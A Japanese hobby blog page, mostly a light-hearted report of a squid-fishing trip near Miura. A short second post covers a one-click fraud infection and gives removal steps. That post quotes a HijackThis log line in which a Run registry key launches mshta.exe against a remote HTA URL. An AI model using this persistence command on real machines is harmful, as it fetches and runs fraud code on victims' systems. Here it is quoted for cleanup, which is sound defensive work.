第三京浜からバヒュッと三浦方面へ、あーでもないこーでもない考えてるうちに長井へ到着。ここって来ると前後に居る車が全てイカ釣りの人に見えてしまう不思議ワールド・・・いや、私だけか?

取り急ぎストリートビューで調べた通りに進んで無事こみゃみゃみゃみゃる発見。別に悪い事してるわけでもないのに抜き足さし足大根足で釣座の札(σ・∀・)σゲッツ!!
オオドモ2カ所は既に札は無いようです。自分いつもの左舷ミヨシが空いてたのでなんとなく安心して札を・・・ベリッ・・・。
ベリ?
マジックテープでしたw
色々工夫があるのですね、これならカッパにもくっつくじゃーん、と思ってなんとなく服にベリベリつけてみたwww

カサカサっと逃げてセブンイレブンまで撤退。朝飯。
念入りに飲み物買ってゆっくり朝飯。ついったーで確認すると、土曜日は皆様各方面へ釣りにお出かけの様子で自分も嬉しくなっちゃいますね。(;゚∀゚)=3ムッハー

港に戻ると店をあけてたので早速突撃。
おはようございます!しかし!!!

早すぎた。

お茶頂いてすすりつつ・・・金魚や亀と対話。海からはそよそよ風が吹いて・・・何か非常に・・・ココチヨイ。
ここ最近は土曜日はお客さんが少ないとの事。そんな話してると常連の方々がテクテクと現れてお茶タイム。目の前の船がついてるところにものどかな雰囲気で、全員でたぶん5名乗りこんで出発~。予定より早めに岸払いです。

IMGP0661_2.JPG

今日はほんとキモチイイ日だね。風がほんのりソヨソヨなので船がとまっても死にそうに暑いという事もなく、まぁ、日中はピーカンになって大変だったけど。
そしてこの上の写真が本日まさか完全フカセの元気な姿の最期になるとは・・・(火スペ風)。

イカの御機嫌は朝なかなかどうして麗しいです。
第1投目で乗ってきた後が結構続く。1流しが長く何度もとれちゃうぜぇー?!最近こういうの、なかったよね?!
と、御機嫌になった本日の3投目・・・・に・・・・・・あ・・・・・・・・・あれ?
電動が・・・・・・へ?!?!?!巻いてこない?!
おい!どうしたよ!!!Σ(゚д゚lll)
「ハイあげてくださいー」
あがってくださいいいいぃぃーーーーーーーーー!!!(エア土下座)

・・・・・・・・・・・・・・・・だめぽ(´・ω・`)
液晶表示はOK、音もちゃんとモーター巻く音は、する。
がしかし、物理的に巻いてこない。どっか・・・外れたんかな。
棚が浅くて助かった。
ギリギリギリギリ手で巻いて回収。

こうなってしまっては仕方ない、いつもベンチに控えてる初代イカスペに働いて頂く。
久し振りに手にしたオレンジ色のイカスペ・・・あぁ・・君はなんて手にしっくりなじむんだ。。。(溜息)
何度となく私に快感を覚えこませ、何度となく共に泣いた初代イカスペ・・・君こんなにちっちゃかったっけ。

という事で気合再注入!!!
頑張ります。
底130mで80~110前後の指示棚
落とすたびに派手な乗りではないけど確実に増えてゆくスルメ。即ノリはほとんどないけど、ゆるゆる巻いて来るとクンッと遠慮がちに触るのでビシッとあわせてきます。
この日は最高5杯掛けというプチシビレるノリもあり、沖干し作るのが手が遅いせいで全く間に合わん。うおー大変じゃー。ってか竹串あんまり持ってこなかったから不足してきたー(駄目じゃん)。

真剣に・・・イカさばく。
サメの被害をおさえる為、目玉とか内臓とかはその場でポイポイせず、桶にためておいて後で捨てますヨ。

IMGP0662_2.JPG

暑いので、お店で朝頂いたトマト食べるの図。うめー!!!
冷やしトマト最高~♪
(*´Д`)ハァハァ
暑いよ(;゚∀゚)=3ハァハァ
朝は薄曇りだったハズがドピーカンの真夏空が頭上には広がり、後ろにはいつの間にか沖干しズラリ。
後ろのオジサマに氷入りのちべたいジュースを御馳走になり御満悦。
有難う御座います~!!

んが・・・途中から急にノリしぶくなり自分釣れない流しが次第に増えてくる中、後ろのオジサマはポツポツと掛けてゆく・・・・何かきっと違うのだな?
観察・・・・・・・・するも、左舷二人しかいないので遠いww

うーん・・・・小さく釣ってる?
うー・・・・ぎゃー(ビシッとアワセ)。
しんぼうたまらんです。

最後の流しがこれまたぽつぽつーっと獲れてフィニッシュ!ジャスト60杯でなかなか型もヨシヨシ。

IMGP0663_2.JPG

久し振りな沖干しズラリコース。2本目行ったのほんとに久し振りかもしれないな。トップ79杯で2番手だったようですが、沖から戻ってきて船長に城ケ島沖のデリケートなイカの釣り方を御指南頂きました!
要約すると、私のガサツででかいシャクリだとイカが「きゃ~Σ(゚∀゚ノ)ノ」と逃げてしまうので、小さく、そして鋭く!!
小さく そして鋭く。
小さく そして鋭く。
目標をセンターに入れてスイッチ・・・
目標をセンターに入れてスイッ・・・・ちがう

なんだか今日は盛り沢山・・・と爽やかに陸へ戻って・・・どんぶり盛りのひやむぎが待っててたまげたww 話によると今日は茹で過ぎたとの事・・・なので、いつもは違うのかな、おもいっきりハラいっぱいいっぱい美味かったです。何気に上にのってたワカメが美味でした。

帰りの車の中、がついた上に燃え上がったスルメへの熱情をもてあましつつ・・・車停めておもむろに、電話。
「もしもし~御無沙汰しております~、今度はフカセ壊しちゃいましたので近日中に持って行きます~。あ、それでですね、新しいイカスペの話を個人的な意見でおうかがいしたいのですが~」
・・・しばしぶっちゃけトーク
「はい、はい~では糸&とり置き宜しくお願いしま~す」

・・・・・・・・・・・・・ん?

本日の教え:竹串は十分に(やられたー)
        電動リールはスペアも必ず持参(いつでも持ってるぜー)
        城ケ島沖のデリケートなイカは短く鋭く(次実践)
      
常連の皆様もとても親切で楽しい一日でした。
船長・女将さん・皆様 有難う御座いましたー。

スルメの麻薬のような呪いに転落の一途をたどるわたくしでした・・・・・。

【ウイルス】HTAファイルを利用したワンクリ詐欺サイト【備忘録】

皆様こんにちは、ボタンがあったら即押したい、海があったら釣りしたい、穴があったら入りたい、けーすけで、御座います。
如何お過ごしでしょうか。

久し振りにイイ生ログが採取出来たから備忘録。
昆虫採集の時期ですなぁ。

HijackThisのログに見事にエントリ出ますね。
不正なワンクリ詐欺のポップアップ出るケース。

O4 - HKCU\..\Run: [Skyae9564_5403404] "C:\WINDOWS\system32\mshta.exe" "http://****.movie109.info/dkbpl/GV0eaZ8l9jTPyeG3b8Pf5g.jsp"

HijackThisのスキャンで上記エントリをFix。mshta.exeのプロセスを停止して再起動で対応終了のようだ。
mshta.exeファイル自体は普通のMSの正規ファイルなのでファイルはそのまま。
なかなか見事だね、これ。

INTERNET Watch の情報サイト

このページの上部へ

About

脱HTMLの為にちまちま手動で作った管理人けーすけの試行錯誤ブログ。
愛車スカイライン&コペンと温泉と酒と烏賊釣り触手吸盤プレイの日々…破廉恥下ネタアリのfor Adult仕様
ようやくスマホ向けページが出来たよヽ(`Д´)ノウワァァァン!!

プロフィール

HN:けーすけ
愛車HR34と温泉と釣りとお酒をこよなく愛する3●歳
Twitterアカウントは@keisuke_remixで。

サイト内検索

最近のコメント

最近のピクチャ

  • DSC_0317.JPG
  • DSC_0204.JPG
  • levelup_20150113_124345_0.png
  • DSC_0200.JPG
  • DSC_0189.JPG
  • DSC_0185.JPG
  • P1090042.JPG
  • DSC_0166.JPG
累計
本日人  昨日

Powered by Movable Type 5.161-ja